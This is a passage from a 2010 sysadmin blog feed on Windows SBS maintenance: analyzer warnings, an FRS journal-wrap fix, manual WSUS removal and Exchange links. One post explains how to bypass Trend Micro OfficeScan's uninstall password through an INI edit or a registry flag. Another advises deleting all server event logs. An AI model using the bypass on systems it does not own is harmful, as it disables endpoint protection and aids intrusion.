/&gt;Thanks.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-3816492204973145366?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/3816492204973145366/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=3816492204973145366&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3816492204973145366'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3816492204973145366'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2010/12/sbs-2003-bpa-question-managed-recipient.html' title='SBS 2003 BPA question Managed Recipient Policies'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_ZIjWENX5vtM/TQqAgl1oDEI/AAAAAAAAAVY/2dpziry0sUQ/s72-c/ss2.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8093648230150792909</id><published>2010-12-16T17:33:00.000+11:00</published><updated>2010-12-16T17:33:09.170+11:00</updated><title type='text'>SBS BPA Known Issues/Common Questions</title><content type='html'>&lt;div class="post-content user-defined-markup"&gt;1) You get a warning  &lt;br /&gt;&lt;b&gt;Windows Server Update Services 2.0 installed&lt;/b&gt; &lt;br /&gt;&lt;i&gt;This  server is running Windows Server Update Services 2.0. You should  upgrade Windows Server Update Services 2.0 to Windows Server Update  Services 3.0. For information about upgrading Windows Server Update  Services 2.0 to Windows Server Update Services 3.0, see ”Installing  Windows Server Update Services 3.0 on Windows SBS 2003” at the Microsoft  Web site (http://go.microsoft.com/fwlink/?linkid=77404).&lt;/i&gt; &lt;br /&gt;This should refer to the link &lt;a href="http://go.microsoft.com/fwlink/?linkid=89081"&gt;http://go.microsoft.com/fwlink/?linkid=89081&lt;/a&gt; instead of &lt;a href="http://go.microsoft.com/fwlink/?linkid=77404"&gt;http://go.microsoft.com/fwlink/?linkid=77404&lt;/a&gt;. This will be addressed in the first update to the BPA. &lt;br /&gt;2) You get one or both of the following warnings  &lt;br /&gt;&lt;b&gt;Windows SBS 2003 R2 Technologies installed&lt;/b&gt; &lt;br /&gt;&lt;i&gt;Windows  SBS 2003 has the Windows SBS 2003 R2 Technologies installed but Service  Pack 2 for Windows SharePoint Services 2.0 is not installed.&lt;/i&gt; &lt;br /&gt;or &lt;br /&gt;&lt;b&gt;Daylight Savings Time not updated&lt;/b&gt; &lt;br /&gt;&lt;i&gt;Windows  SharePoint Services has not been updated for Daylight Savings Time. For  more information see the Knowledge Base articles "Description of the  update for Windows SharePoint Services: January 9 2007" at  http://go.microsoft.com/fwlink/?LinkId=95936 and "Description of the  Windows SharePoint Services post-Service Pack 2 hotfix package: March 9  2007" at &lt;a href="http://go.microsoft.com/fwlink/?LinkId=95163"&gt;http://go.microsoft.com/fwlink/?LinkId=95163&lt;/a&gt;.&lt;/i&gt; &lt;br /&gt;Please  click on the Tree Reports radio button and then go under Windows Small  Business Server Baseline/Technologies/Windows SharePoint Services  2.0/HKEY_LOCAL_MACHINE\Software\Microsoft\Shared Tools\Web Server  Extensions\6.0 and see if the value for the Version = 6.0.2.8165 or  greater. If so, then it appears that you have WSS SP3 (or later)  installed and you should be able to ignore the above warnings. &lt;br /&gt;If  the Version is less than 6.0.2.6568 then it would appear the WSS SP2  has not been installed. This will be addressed in the first update to  the BPA. &lt;br /&gt;3) You get a warning  &lt;br /&gt;&lt;b&gt;Small Business registry key exists&lt;/b&gt; &lt;br /&gt;&lt;i&gt;The  Small Business registry key exists and should be removed. You should  either back up or export this registry key and then delete the Small  Business registry key located at  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Small Business.&lt;/i&gt; &lt;br /&gt;We will include a link to &lt;a href="http://support.microsoft.com/default.aspx/kb/914990"&gt;http://support.microsoft.com/default.aspx/kb/914990&lt;/a&gt; in order for you to get more information about this registry key. This will be addressed in the first update to the BPA. &lt;br /&gt;4) You get a warning even though you have Windows Server 2003 SP1 or SP2 installed &lt;br /&gt;&lt;b&gt;Windows SBS 2003 Service Pack 1 not installed&lt;/b&gt; &lt;br /&gt;&lt;i&gt;Windows  SBS 2003 SP1 is available. For download information, see  http://go.microsoft.com/fwlink/?linkid=50694. To order the Windows SBS  2003 cd set (required for Windows SBS 2003 Premium Edition customers),  go to http://go.microsoft.com/fwlink/?linkid=50685.&lt;/i&gt; &lt;br /&gt;This is  by design. Windows SBS 2003 SP1 is an SBS specific service pack. It is  made up of 5 parts including the operating system service pack, Exchange  Server service pack, Windows SharePoint Services service pack, XP SP2  update, and Windows SBS 2003 SP1 itself. The Exchange Server service  packs, XP SP2 update for SBS, and Windows SBS 2003 SP1 itself are not  distributed via Microsoft Update. You must download these components  from the Microsoft Download Center. Please note that the ability to  order the Windows SBS 2003 SP1 cd set (required for Premium customers in  order to get ISA 2004) ends at the end of this year. Additional  information can also be found at &lt;a href="http://blogs.technet.com/sbs/archive/2007/07/03/sbs-2003-sp-0-support-retirement.aspx"&gt;http://blogs.technet.com/sbs/archive/2007/07/03/sbs-2003-sp-0-support-retirement.aspx&lt;/a&gt; &lt;br /&gt;5) You get a warning of  &lt;br /&gt;&lt;b&gt;DNS Client not configured&lt;/b&gt; &lt;br /&gt;&lt;i&gt;The  DNS client is not configured to point only to the internal IP address  of the server. For detailed instructions about configuring the DNS  client, see the "Configurations" section of the Knowledge Base article  "How to configure Internet access in Windows Small Business Server 2003"  at &lt;a href="http://go.microsoft.com/fwlink/?LinkId=95289"&gt;http://go.microsoft.com/fwlink/?LinkId=95289&lt;/a&gt;. &lt;/i&gt; &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Internal Network Adapter is not configured to register IP address in DNS&lt;/b&gt; &lt;br /&gt;&lt;i&gt;Verify  that the internal network card is configured to register in DNS. For  detailed instructions about verifying internal adapter configuration,  see the procedure for "Internal or single network adapter  configuration"&amp;nbsp; in the "Configurations" section of the Knowledge Base  article "How to configure Internet access in Windows Small Business  Server 2003" at &lt;a href="http://go.microsoft.com/fwlink/?LinkId=95289"&gt;http://go.microsoft.com/fwlink/?LinkId=95289&lt;/a&gt;.&lt;/i&gt; &lt;br /&gt;Ensure that the LANNIC registry value has the proper network card GUID. Check using Method 3 in the KB article &lt;a href="http://support.microsoft.com/default.aspx/kb/875422"&gt;http://support.microsoft.com/default.aspx/kb/875422&lt;/a&gt;. &lt;br /&gt;6) Get a warning of  &lt;br /&gt;&lt;b&gt;Outlook Mobile Access is not using .Net Framework version 1.1.4322&lt;/b&gt; &lt;br /&gt;&lt;i&gt;Microsoft  Outlook Mobile Access should be using .Net Framework version 1.1.4322.  To do so, click Start, point to Administrative Tools, click Internet  Information Services (IIS) Manager. In the IIS Manager snap-in,  double-click Web Sites, double-click Default Web Site, right-click oma,  and then click Properties. Click the ASP.NET tab, and then for ASP.Net  version, select 1.1.4322&lt;/i&gt; &lt;br /&gt;&lt;i&gt;And/or&lt;/i&gt; &lt;br /&gt;&lt;b&gt;Remote Web Workplace not using .Net Framework 1.1.4322&lt;/b&gt; &lt;br /&gt;&lt;i&gt;Remote  Web Workplace should be using .Net Framework version 1.1.4322. To do  so, click Start, point to Administrative Tools, click Internet  Information Services (IIS) Manager. In the IIS Manager snap-in,  double-click Web Sites, double-click Default Web Site, right-click  Remote, and then click Properties. Click the ASP.NET tab, and then for  ASP.Net version, select 1.1.4322.&lt;/i&gt; &lt;br /&gt;&lt;i&gt;And/or&lt;/i&gt; &lt;br /&gt;&lt;b&gt;The Windows SBS Backup site is not using .Net Framework 1.1.4322&lt;/b&gt; &lt;br /&gt;&lt;i&gt;The  Windows SBS Backup site should be using .Net Framework version  1.1.4322. To do so, click Start, point to Administrative Tools, and then  click Internet Information Services (IIS) Manager. In the IIS Manager  snap-in, double-click Web Sites, double-click Default Web Site,  right-click Backup, and then click Properties. Click the ASP.NET tab,  and then for ASP.Net version, select 1.1.4322.&lt;/i&gt; &lt;br /&gt;&lt;i&gt;And/or&lt;/i&gt; &lt;br /&gt;&lt;b&gt;Windows SBS Monitoring is not using .Net Framework 1.1.4322&lt;/b&gt; &lt;br /&gt;&lt;i&gt;Windows  SBS Monitoring should be using .Net Framework version 1.1.4322.&amp;nbsp; To do  so, click Start, point to Administrative Tools, click Internet  Information Services (IIS) Manager. In the IIS Manager snap-in,  double-click Web Sites, double-click Default Web Site, right-click  Monitoring, and then click Properties. Click the ASP.NET tab, and then  for ASP.Net version, select 1.1.4322.&lt;/i&gt; &lt;br /&gt;This is by design.  These features were designed and tested against the ASP.Net Framework  v1.1.4322. Note that Remote Web Workplace, Backup, Monitoring and  Companyweb all need to be using the same version of ASP.Net Framework  due to the fact that they are all in the same application pool. If you  change them from v2.0 back to the v1.1.4322 then you may also need to  follow the steps in the More Information section of &lt;a href="http://support.microsoft.com/kb/894903"&gt;http://support.microsoft.com/kb/894903&lt;/a&gt; in order to change Companyweb back to ASP.Net v1.1.4322. &lt;br /&gt;7) Is there a way to silently install and/or schedule the SBS BPA to run?&lt;br /&gt;Currently, there is not a way to silently install and/or run it as a scheduled task.  &lt;br /&gt;8) When will the first update of the BPA be available? &lt;br /&gt;Currently the first update for the BPA is planned to occur by the end of this year.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8093648230150792909?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://blogs.technet.com/b/sbs/archive/2007/10/19/sbs-bpa-known-issues-common-questions.aspx' title='SBS BPA Known Issues/Common Questions'/><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8093648230150792909/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8093648230150792909&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8093648230150792909'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8093648230150792909'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2010/12/sbs-bpa-known-issuescommon-questions.html' title='SBS BPA Known Issues/Common Questions'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-1479194529108894907</id><published>2010-12-15T21:22:00.000+11:00</published><updated>2010-12-15T21:22:06.927+11:00</updated><title type='text'>Remove Trend Micro Client Security Agent Forcefully Or Manually</title><content type='html'>Hello Friends,&lt;br /&gt;&lt;br /&gt;Some time you want to remove / unload Trend Micro Client agent from system(Computer).&lt;br /&gt;&lt;br /&gt;Please fnid here with the details.&lt;br /&gt;&lt;br /&gt;To remove / reset the uninstall password for Trend Micro OfficeScan&lt;br /&gt;&lt;br /&gt;Edit Ofcscan.ini file. (Do a search.)&lt;br /&gt;On Windows.95/98/XP machines it is usually in C:\Windows\Ofcscan.ini&lt;br /&gt;On Windows.NT/2K machines it is usually in C:\WINNT\Ofcscan.ini&lt;br /&gt;Open the Ofcscan.ini file using notepad search for the [INI_CLIENT_SECTION]&lt;br /&gt;Find the line reading Uninstall_Pwd= and type a # at the beginning of the line to comment it out.&lt;br /&gt;Insert a new line saying Uninstall_Pwd=70&lt;br /&gt;Save the Ofcscan.ini file and retry the uninstall. When it prompts you for a password, enter a '1'.&lt;br /&gt;&lt;br /&gt;Method 2 for Uninstall Trend Micro Client when you don't know password&lt;br /&gt;&lt;br /&gt;Start --&amp;gt; Run --&amp;gt; regedit --&amp;gt;&lt;br /&gt;HKLM--&amp;gt; Software--&amp;gt;&amp;nbsp; Trend Micro --&amp;gt; PCClinNTCrop --&amp;gt; Misc. &lt;br /&gt;in right side pannel search for Registry "AllowUninstall" edit key to 1 instead of 0.&lt;br /&gt;&lt;br /&gt;Now try to uninstall Trend Micro Via Add and Remove Programe.&lt;br /&gt;&lt;br /&gt;If this method don't work &lt;br /&gt;reboot your workstation / system to safe mode&amp;nbsp; and remove Trend Micro&lt;br /&gt;Good Luck!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-1479194529108894907?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/1479194529108894907/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=1479194529108894907&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1479194529108894907'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/1479194529108894907'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2010/12/remove-trend-micro-client-security.html' title='Remove Trend Micro Client Security Agent Forcefully Or Manually'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-4047805561258518824</id><published>2010-12-14T18:28:00.000+11:00</published><updated>2010-12-14T18:28:45.656+11:00</updated><title type='text'>Migrating Your Existing Infrastructure SBS 2003 to the SBS 2008 Environment</title><content type='html'>&lt;span class="tl"&gt;&lt;h3 class="r"&gt;&lt;a class="l" href="http://www.google.com.au/url?sa=t&amp;amp;source=web&amp;amp;cd=1&amp;amp;ved=0CBcQFjAA&amp;amp;url=http%3A%2F%2Fdownload.microsoft.com%2Fdocuments%2FFrance%2FTechNet%2F2009%2FSBS%2FHands-on-labs_Windows_SBS_2008_Migration_from_SBS2003.pdf&amp;amp;rct=j&amp;amp;q=windows%20SBS%202008%20Migrating%20Your%20Existing%20Infrastructure%20to%20the%20SBS%20Environment&amp;amp;ei=WRsHTd7hA4_jrAeZqJ3bDQ&amp;amp;usg=AFQjCNHvDVFZq2jovuZyx9mHTqylzKhqlA&amp;amp;sig2=5JWBOdD6yG84W_pGrTIQEg&amp;amp;cad=rja"&gt;&lt;i&gt;Migrating Your Existing Infrastructure to the SBS Environment&lt;/i&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h3 class="r"&gt;&lt;i&gt;Click the above link to get step by step document on Migration/Upgrade your Existing SBS2003 Infrastructure to SBS 2008 Environment.&amp;nbsp;&lt;/i&gt;&lt;/h3&gt;&lt;h3 class="r"&gt;&lt;i&gt;&lt;a href="http://www.google.com.au/url?sa=t&amp;amp;source=web&amp;amp;cd=1&amp;amp;ved=0CBcQFjAA&amp;amp;url=http%3A%2F%2Fdownload.microsoft.com%2Fdocuments%2FFrance%2FTechNet%2F2009%2FSBS%2FHands-on-labs_Windows_SBS_2008_Migration_from_SBS2003.pdf&amp;amp;rct=j&amp;amp;q=windows%20SBS%202008%20Migrating%20Your%20Existing%20Infrastructure%20to%20the%20SBS%20Environment&amp;amp;ei=WRsHTd7hA4_jrAeZqJ3bDQ&amp;amp;usg=AFQjCNHvDVFZq2jovuZyx9mHTqylzKhqlA&amp;amp;sig2=5JWBOdD6yG84W_pGrTIQEg&amp;amp;cad=rja"&gt;http://www.google.com.au/url?sa=t&amp;amp;source=web&amp;amp;cd=1&amp;amp;ved=0CBcQFjAA&amp;amp;url=http%3A%2F%2Fdownload.microsoft.com%2Fdocuments%2FFrance%2FTechNet%2F2009%2FSBS%2FHands-on-labs_Windows_SBS_2008_Migration_from_SBS2003.pdf&amp;amp;rct=j&amp;amp;q=windows%20SBS%202008%20Migrating%20Your%20Existing%20Infrastructure%20to%20the%20SBS%20Environment&amp;amp;ei=WRsHTd7hA4_jrAeZqJ3bDQ&amp;amp;usg=AFQjCNHvDVFZq2jovuZyx9mHTqylzKhqlA&amp;amp;sig2=5JWBOdD6yG84W_pGrTIQEg&amp;amp;cad=rja&lt;/a&gt;&amp;nbsp;&lt;/i&gt;&lt;/h3&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-4047805561258518824?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/4047805561258518824/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=4047805561258518824&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4047805561258518824'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4047805561258518824'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2010/12/migrating-your-existing-infrastructure.html' title='Migrating Your Existing Infrastructure SBS 2003 to the SBS 2008 Environment'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-5070188082370276653</id><published>2010-12-11T12:03:00.002+11:00</published><updated>2010-12-11T12:06:00.464+11:00</updated><title type='text'>Troubleshooting journal_wrap errors shows in AD Migration Preparation tools SBS2003-2008</title><content type='html'>When performing Windows SBS 2003 to SBS 2008 Migration/Upgrade.&lt;br /&gt;At the stage of:&lt;br /&gt;Run Migration Preparation tool from Windows SBS 2008 DVD&lt;br /&gt;Gives an error of AD in Journal Wrap mode and perform following steps.&lt;br /&gt;&lt;br /&gt;The solution is &lt;br /&gt;&lt;br /&gt;Delete Event logs from server all logs just delete.&lt;br /&gt;1. Click Start, and then click Run.&lt;br /&gt;2. In the Open box, type cmd and then press ENTER.&lt;br /&gt;3. In the Command box, type net stop ntfrs.&lt;br /&gt;4. Click Start, and then click Run.&lt;br /&gt;5. In the Open box, type regedit and then press ENTER.&lt;br /&gt;6. Locate the following subkey in the registry:&lt;br /&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Backup/Restore\Process at Startup&lt;br /&gt;7. In the right pane, double-click BurFlags.&lt;br /&gt;8. In the Edit DWORD Value dialog box, type D2 and then click OK.&lt;br /&gt;9. Quit Registry Editor, and then switch to the Command box.&lt;br /&gt;10. In the Command box, type net start ntfrs.&lt;br /&gt;11. Quit the Command box.&lt;br /&gt;&lt;br /&gt;When the FRS service restarts, the following actions occur:&lt;br /&gt;&lt;br /&gt;* The value for BurFlags registry key returns to 0.&lt;br /&gt;* Files in the reinitialized FRS folders are moved to a Pre-existing folder.&lt;br /&gt;* An event 13565 is logged to signal that a nonauthoritative restore is started.&lt;br /&gt;* The FRS database is rebuilt.&lt;br /&gt;* The member performs an initial join of the replica set from an upstream partner or from the computer that is specified in the Replica Set Parent registry key if a parent has been specified for SYSVOL replica sets.&lt;br /&gt;* The reinitialized computer runs a full replication of the affected replica sets when the relevant replication schedule begins.&lt;br /&gt;* When the process is complete, an event 13516 is logged to signal that FRS is operational. If the event is not logged, there is a problem with the FRS configuration. &lt;br /&gt;&lt;br /&gt;Note: The placement of files in the Pre-existing folder on reinitialized members is a safeguard in FRS designed to prevent accidental data loss. Any files destined for the replica that exist only in the local Pre-existing folder and did not replicate in after the initial replication may then be copied to the appropriate folder. When outbound replication has occurred, delete files in the Pre-existing folder to free up additional drive space.&lt;br /&gt;&lt;br /&gt;Also try this too.&lt;br /&gt;&lt;br /&gt;Increasing the USN journal size, and thus the number of changes that it can hold before the journal "wraps", decreases the possibility that the USN journal wrap will occur. The USN journal size can be changed by setting the following registry key:&lt;br /&gt;HKLM\System\CCS\Services\NTFRS\Parameters\"Ntfs Journal size in MB" (REG_DWORD)&lt;br /&gt;Valid settings range from 8 to 128 megabytes (MB) with a default of 32 MB. This setting applies to all volumes that are hosting an FRS replica tree. You have to stop and then restart the NTFRS service for the increases to the USN journal size take affect. Decreases to the USN journal size can only be made by reformatting all volumes that contain FRS-replicated content.&lt;br /&gt;&lt;br /&gt;The number of changes that a given USN journal file can hold can be estimated with the following formula:&lt;br /&gt;journal size/((60 bytes + (length of file name)) * 2)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-5070188082370276653?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='enclosure' type='' href='http://support.microsoft.com/kb/290762' length='0'/><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/5070188082370276653/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=5070188082370276653&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/5070188082370276653'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/5070188082370276653'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2010/12/troubleshooting-journalwrap-errors.html' title='Troubleshooting journal_wrap errors shows in AD Migration Preparation tools SBS2003-2008'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8557162996669836249</id><published>2010-04-28T23:04:00.001+10:00</published><updated>2010-04-28T23:04:38.167+10:00</updated><title type='text'>How To remove WSUS Manually</title><content type='html'>1. Download the SDK to obtain MSIZAP&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;To obtain the Windows Server 2003 SP1 Platform SDK, visit the following Microsoft Web site:&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;http://www.microsoft.com/downloads/details.aspx?FamilyId=A55B6B43-E24F-4EA3-A93E-40C0EC4F68E5&lt;br /&gt;&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;&lt;!--[endif]--&gt;&lt;br /&gt;&lt;br /&gt;2. From a command prompt, type:&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;For WSUS 2.0: MSIZAP T { A0D46DC6-8950-451A-8990-53C86E17666E}&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;For WSUS 3.0: MSIZAP T {2C0D7E35-EE6E-4DC7-BA13-2C68AEDEB59D}&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;3. From a command prompt, type: sc delete wsusservice&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;4. Again, From a command prompt, type: MSIZAP T {2C0D7E35-EE6E-4DC7-BA13-2C68AEDEB59D}&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;5. Run following command to ensure the Windows internal database is removed.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;On 32-bit platforms: msiexec /x {CEB5780F-1A70-44A9-850F-DE6C4F6AA8FB} callerid=ocsetup.exe&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;On 64-bit platforms: msiexec /x {BDD79957-5801-4A2D-B09E-852E7FA64D01} callerid=ocsetup.exe&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;6. Reboot the server.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;7. From a command prompt, type: aspnet_regiis –i&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;8. From a command prompt, type: iisreset&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8557162996669836249?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8557162996669836249/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8557162996669836249&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8557162996669836249'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8557162996669836249'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2010/04/how-to-remove-wsus-manually.html' title='How To remove WSUS Manually'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-4433390981699256591</id><published>2010-03-30T17:54:00.001+11:00</published><updated>2010-03-30T17:54:30.019+11:00</updated><title type='text'>Configuring Exchange 2007 as an Authenticated or Anonymous SMTP Relay</title><content type='html'>&lt;a href=http://www.petri.co.il/authenticated-or-anonymous-smtp-relay-with-exchange-2007.htm&gt;Configuring Exchange 2007 as an Authenticated or Anonymous SMTP Relay&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Posted using &lt;a href="http://sharethis.com"&gt;ShareThis&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-4433390981699256591?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/4433390981699256591/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=4433390981699256591&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4433390981699256591'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4433390981699256591'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2010/03/configuring-exchange-2007-as.html' title='Configuring Exchange 2007 as an Authenticated or Anonymous SMTP Relay'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6244782714089609760</id><published>2010-03-22T11:26:00.000+11:00</published><updated>2010-03-22T11:31:15.626+11:00</updated><title type='text'>Upgrade/Migration/Transtioning AD/Exchange 2003 Std to Ad/Exchange 2008 Ent. x64 Part III</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;o:officedocumentsettings&gt;   &lt;o:relyonvml/&gt;   &lt;o:allowpng/&gt;  &lt;/o:OfficeDocumentSettings&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;link rel="themeData" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:trackmoves/&gt;   &lt;w:trackformatting/&gt;   